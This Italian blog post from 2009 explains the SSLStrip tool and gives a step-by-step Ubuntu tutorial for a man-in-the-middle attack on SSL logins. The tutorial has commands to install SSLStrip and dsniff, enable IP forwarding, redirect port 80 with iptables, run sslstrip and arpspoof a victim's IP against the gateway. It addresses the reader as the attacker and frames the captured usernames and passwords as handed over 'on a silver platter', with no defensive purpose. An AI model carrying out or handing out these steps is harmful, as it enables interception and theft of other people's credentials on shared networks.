Intercettare i dati scambiati sulle “connessioni sicure” SSL
Hacking
- 2 ottobre 2009 | scritto da Erriko
Abbiamo già trattato in precedenti articoli del concetto e dei rudimenti dell’attacco Man In The Middle (MITM), focalizzandoci sul software Ettercap.
Grazie ad Ettercap ed ai sui plug-ins abbiamo scoperto come è possibile per un hacker sniffare molti dei dati di accesso (username e password) che transitano per un determinato network.
La mole di dati intercettabili, però, è limitata dal fatto che Ettercap ci permette, salvo opportuni accorgimenti (di cui parleremo in futuro), di intercettare soltanto i nomi utente e le password che vengono inviati in chiaro.
Se i dati passano per connessioni sicure SSL (quelle delle famose pagine https), quindi, diviene tutto più complesso.
Di recente però un hacker specializzato nello studio del protocollo SSL/TLS, Moxie Marlinspike, ha creato un tool dedicato a questa situazione.
Si tratta di SSLStrip, ed è in grado di intercettare le connessioni ssl servendosi della tecnica dell’hijacking.
Come funziona
Sebbene efficace, SSLStrip si basa su un concetto abbastanza semplice.
In sostanza il tool analizza continuamente la rete, intercettando il traffico SSL nonappena un client fa richiesta di una pagina cifrata.
In questo caso il software crea una copia in chiaro della pagina richiesta dalla vittima. Quest’ultima verrà quindi dirottata sulla pagina clonata nella quale inserirà i propri dati di accesso, fornendoli praticamente su un piatto d’argento all’attaccante.
Il tool è scritto in python e verrà sicuramente eseguito senza problemi su una qualsiasi macchin Linux.
Guida all’uso su Ubuntu
La procedura che prenderemo in considerazione riguarda Ubuntu, ma è replicabile con minime differenze su tutte le distribuzioni.
Installazione di base
Innanzitutto è necessario installare i software richiesti per l’esecuzione ed il funzionamento dello script, digitiamo quindi sul terminale:
sudo apt-get install python && sudo apt-get install python-twisted-web && sudo apt-get install dsniff
Adesso scarichiamo il file contente SSLStrip cliccando qui sulla Scrivania. Digitamo quindi sul terminale:
cd Scrivania
tar zxvf sslstrip-0.6.tar.gz
cd sslstrip-0.6
sudo python ./setup.py install
L’attacco
- Mandiamo la scheda di rete in forwarding mode digitando:
sudo su
echo "1" > /proc/sys/net/ipv4/ip_forward
Settiamo le iptables in maniera da reindirizzare il traffico HTTP verso SSLStrip digitando:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <porta>
Avviamo SSLStrip, questavolta digitando:
python ./sslstrip.py -l <porta>
n.b. Alle precedenti righe andrà sostituito <porta> con il numero corrispondente alla porta da mettere in ascolto per l’attacco.
- Abbiamo terminato, non ci resta che avviare un arpspoof per obbligare la rete a reindirizzare il traffico verso la macchina attaccante. Per fare ciò apriamo un altro terminale lasciando aperto il precedente. Digitiamo sul nuovo terminale:
arpspoof -i <interface> -t <targetIP> <gatewayIP>
Dove andrà messo al posto di <targetIP> l’ip della vittima e al posto di <gatewayIP> l’indirizzo il del router.
A questo punto lo script inizierà a lavorare secondo il procedimento accennato sopra catturando i dati di accesso.
Per concludere vi propongo un video dimostrativo del funzionamento dello script (ma ne trovate parecchi altri cercando sslstrip su youtube).
[...] Intercettare i dati scambiati sulle “connessioni sicure” SSL venerdì 2 ottobre 2009 | Tratto da: http://www.erriko.it/ Nessun commento [...]